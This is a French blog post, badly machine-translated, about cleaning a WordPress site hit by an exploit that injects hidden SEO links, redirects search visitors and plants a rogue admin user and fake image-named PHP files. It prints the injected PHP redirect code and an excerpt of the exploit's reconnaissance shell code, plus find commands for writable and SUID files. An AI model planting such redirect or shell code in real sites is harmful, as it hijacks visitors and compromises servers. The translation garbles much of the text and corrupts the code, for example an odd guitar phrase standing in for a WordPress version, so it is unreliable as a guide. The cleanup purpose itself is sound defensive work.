Virus de la blogosphère ... mais ce que vous avez fait pour moi?

Dans le dernier mois, j'ai reçu des avertissements virus dans le blog de certains visiteurs. Au départ, j'ai ignoré les avertissements, parce que j'ai installé un très bon antivirus (Kaspersky AV 2009) Et même blog depuis longtemps, je n'ai jamais reçu une alerte de virus (il ya longtemps .. J'ai vu quelque chose de suspect que la première actualisation disparu. Enfin ...).
Lentement commencé à montrer des variations importantes la circulation des visiteursAprès quoi, récemment diminué de façon constante du trafic et a commencé à être de plus en plus me dire que stealthsettings.com il est virused. Hier, j'ai reçu d'une personne une capture d'écran effectuée lorsque antivirus a bloqué un scénario sur stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. C'était assez convaincant pour moi, alors j'ai mis toutes les sources recherchées. La première idée qui m'est venue à l'esprit était de faire améliorer plus tard SXNUMX Custom Shop Guitars (2.5.1), mais pas avant l'ancien script pour supprimer tous les fichiers de WordPress et de faire base de données de sauvegarde. Cette procédure a été retenue et n'aurait sans doute pas fallu longtemps pour donner mon sema douloureux où, si je vous aurais dit dans une discussion autour d'un café, il a trouvé Google et il serait bien de le voir.
MyDigitalLife.info, a publié un article intitulé: "WordPress Hack: Récupérer et réparer Google et moteurs de recherche ou Non trafic redirigé vers votre Cookie-Needs.info, AnyResults.Net, Golden-Info.net et autres sites illégaux"C'est la fin du fil dont j'avais besoin.
Il s'agit d'un exploiter Sur la base de biscuit WordPressQui je pense est très complexe et fait le livre. Assez intelligent pour faire une Injection SQL Blog de base de données, pour créer un utilisateur invisible un contrôle de routine simples Tableau De Bord->Utilisateurs, vérifier les répertoires du serveur et des fichiers "en écriture" (Avec chmod 777), de chercher et de exécuter fichiers avec les privilèges du groupe ou de la racine. Je ne sais pas qui exploitent le nom et voir qu'il ya peu d'articles écrits à son sujet, en dépit du fait que de nombreux blogs sont infectés, y compris la Roumanie. Ok ... Je vais essayer de tenter d'expliquer les généralités sur les virus.

Quel est le virus?

Tout d'abord, insérez les pages sources sur les blogs, des liens invisibles pour les visiteurs mais visible et indexables par les moteurs de recherche, notamment Google. De cette façon sites de transfert Page Rank indiquées par l'attaquant. Deuxièmement, est inséré code de redirection URL pour les visiteurs en provenance de Google, Live, Yahoo, ... ou un lecteur de flux RSS et non le site en gâteau. un antivirus détecte que la redirection Trojan-Clicker.HTML.

Symptômes:

Diminution de la circulation des visiteurs massifEn particulier sur les blogs où la plupart des visiteurs proviennent de Google.

Identification: (Donc compliquer le problème pour ceux qui ne savent pas comment faire pour phpmyadmin, php et linux)

LA. ATTENTION! Faire d'abord une base de données de sauvegarde!

1. Vérifiez les fichiers source index.php, header.php, footer.php, Le thème du blog et de voir si il ya un code qui utilise le cryptage base64 ou contient "if ($ service ==" 1 && sizeof ($ _COOKIE) == 0?) "formulaire:

<? Php
Seref $ = array ("google", "msn", "vivre", "altavista"
"Ask", "yahoo", "AOL", "CNN", "temps", "alexa");
$ Ser = 0; foreach ($ Seref que $ ref)
if (strpos (strtolower
($ _SERVER ['HTTP_REFERER']), $ ref) == false) {$ service = "1;? Pause;}!
if ($ service == "1 && sizeof ($ _COOKIE) == 0?) {header (" Location: ". base64_decode (" ")." http:// YW55cmVzdWx0cy5uZXQ = / "); exit;
}?>

... Ou quelque chose. Supprimer ce code!

Cliquez sur l'image ...

index des codes de

Dans la capture d'écran ci-dessus, j'ai accidentellement coché la case "<? Php get_header ();?>". Ce code doit rester.

2. Utiliser phpMyAdmin et aller à la table de base de données wp_usersOù vérifier si il n'ya pas de nom d'utilisateur créé sur 00:00:00 0000-00-00 (Possible dans le champ USER_LOGIN écrire "WordPress". Notez l'ID utilisateur (ID de champ), puis supprimez-le.

Cliquez sur l'image ...

faux utilisateur

* La ligne verte doit être retiré et conservé son identité. Dans le cas d' Etait ID = 8 .

3. Allez à la table wp_usermetaOù que vous situé et essuyer lignes de ID (où le champ user_id Valeur d'ID est supprimé).

4. table wp_option, Go active_plugins et de voir ce plugin est activé suspect. Il peut être utilisé comme terminaisons _old.giff, _old.pngg, _old.jpeg, _new.php.giffEtc combinaisons d'extensions avec l'image _old et _New faux.

SELECT * FROM WHERE option_name wp_options = 'active_plugins'

Supprimer ce plugin, puis allez dans le blog - Tableau de bord> -> Plugins et activer un plugin qui désactive certains.

Cliquez sur l'image pour la voir fichier apparaît virus active_plugins.

plug-in

Suivez le chemin sur le serveur FTP ou SSH, indiqué dans active_plugins et supprimer le fichier à partir du serveur.

5. Toujours dans phpMyAdmin, dans le tableau wp_option, Trouvez et supprimez la ligne contenant "rss_f541b3abd05e7962fcab37737f40fad8«Et»internal_links_cache ".
En internal_links_cache, proposer des liens mails cryptés qui apparaissent dans un blog Code de Google Adsense, Le pirate.

6. Il est recommandé de changer le mot de Blog et à l'identification supprimer tous les userele suspect. Mise à niveau vers la dernière version de WordPress et mis le blog à ne pas permettre l'enregistrement de nouveaux utilisateurs. Il n'y a pas de perte ... pouvez commenter et illogique.

J'ai essayé d'expliquer ci-dessus, plus ou moins, ce qu'il faut faire dans une telle situation, pour nettoyer le blog virus. Le problème est plus grave qu'il n'y paraît loin d'être résolu et, pour une utilisation les failles de sécurité hébergeant le serveur web, ce qui est blog.

En tant que première mesure de sécurité, l'accès SSH, Faire quelques vérifications sur le serveur pour voir si il ya des fichiers comme * _old * et * _New. * Avec terminaisons.giff,. jpeg,. pngg,. jpgg. Ces fichiers doivent être supprimés. Si vous renommez un fichier, par exemple. top_right_old.giff in top_right_old.phpNous voyons que le fichier est exactement le serveur de code exploit.

Quelques indications utiles sur la vérification, le nettoyage et le serveur de sécurité. (Via SSH)

1. cd / tmp et vérifier s'il ya des dossiers comme tmpVFlma ou un autre nom asemenatoare combinaisons et supprimez-le. Voir la capture d'écran ci-dessous, ces deux dossiers à moi:

tmpserver

rm-rf nom_dossier

2. Vérifiez elimiati (changement chmod-mail) dossiers avec des attributs que possible chmod 777

trouver tous les fichiers accessibles en écriture dans répertoire courant: Trouvez. -Type f-perm-2-ls
trouver tous les répertoires accessibles en écriture dans répertoire courant: Trouvez. -Type d-perm-2-ls
trouver tous les répertoires et les fichiers accessibles en écriture dans répertoire courant: trouver. -Permet -2 -ls

3. La recherche de fichiers suspects sur le serveur.

Trouvez. -Nom "* _new.php *"
Trouvez. -Nom "* _old.php *"
trouver. -name "* .jpgg"
trouver. -name "* _giff"
trouver. -name "* _pngg"

4, ATTENTION! les fichiers qui ont mis peu SUID si SGID. Ces fichiers s'exécutent avec les privilèges de l'utilisateur (groupe) ou de la racine, et non l'utilisateur qui exécute le fichier. Ces fichiers peuvent mener à la compromission root, si les questions de sécurité. Si vous n'utilisez pas les fichiers SUID et SGID avec peu, jouer »chmod 0 " eux ou désinstaller paquet les contenant.

Exploiter contient quelque part dans la source ...:

if ($ safe_mode) {
if ($ type_système_exploitation == 'nix') {
$ S = Execute ("sysctl-n kern.ostype. ');
$ S = Execute ("sysctl-n kern.osrelease. ');
$ S = Execute ("sysctl-n kernel.ostype. ');
$ S = Execute ("sysctl-n kernel.osrelease. ');
if (empty ($ user)) $ user = execute ('id');
$ Alias ​​= array (
"=>"
"Trouver les fichiers suid '=>' find /-type f-perm-04000-ls ',
"Trouver les fichiers sgid '=>' find /-type f-perm-02000-ls ',
»Trouver tous les fichiers accessibles en écriture dans le répertoire en cours '=>' trouver. -Type f-perm-2-ls ',
»Trouver tous les répertoires accessibles en écriture dans le répertoire en cours '=>' trouver. -Type d-perm-2-ls ',
»Trouver tous les répertoires accessibles en écriture et les fichiers dans le répertoire en cours '=>' trouver. -Perm-2-ls ',
»Voir ports ouverts '=>' netstat-an | grep-i écouter»,
);
}autre{
. $ Os_name = Execute ('ver');
$ Utilisateur = Execute ("% username% echo. ');
$ Alias ​​= array (
"=>"
"Afficher runing services '=>' net start"
"Afficher la liste des processus '=>' tasklist '
);
}

Dit que moyen ... les failles de sécurité essentiellement. Ports ouvrir le répertoire «inscriptible» et du groupe privilèges d'exécution des fichiers / root.

Retour avec plus ...

Certains blogs infectés: , ,

, , ,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,

emi.brainient.com, www.picsel.ro,

,
, www.itex.ro / blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

, Www.artistul.ro / blog /,

www.mirabilismedia.ro / blog, Blog.einvest.ro
... La liste est longue ... beaucoup.

Vous pouvez vérifier si un blog est un virus, en utilisant le moteur de recherche Google. copier-coller:

Site: www.blegoo.com achat

Bonne nuit et augmentation de travailler ;) Bientôt, je viendrai à Eugene nouvelles sur prevezibil.imprevizibil.com.

brb :)

À: ATTENTION! Changement de thème WordPress ou mise à jour de WordPress 2.5.1, pas une solution pour se débarrasser de ce virus.

Virus de la blogosphère ... mais ce que vous avez fait pour moi?

A propos de l'auteur

infiltration

Passionné par tout ce gadget et Recopie volontiers stealthsettings.com de 2006 et j'aime découvrir de nouvelles choses avec vous sur les ordinateurs et Mac OS, Linux, Windows, iOS et Android.

Laisser un commentaire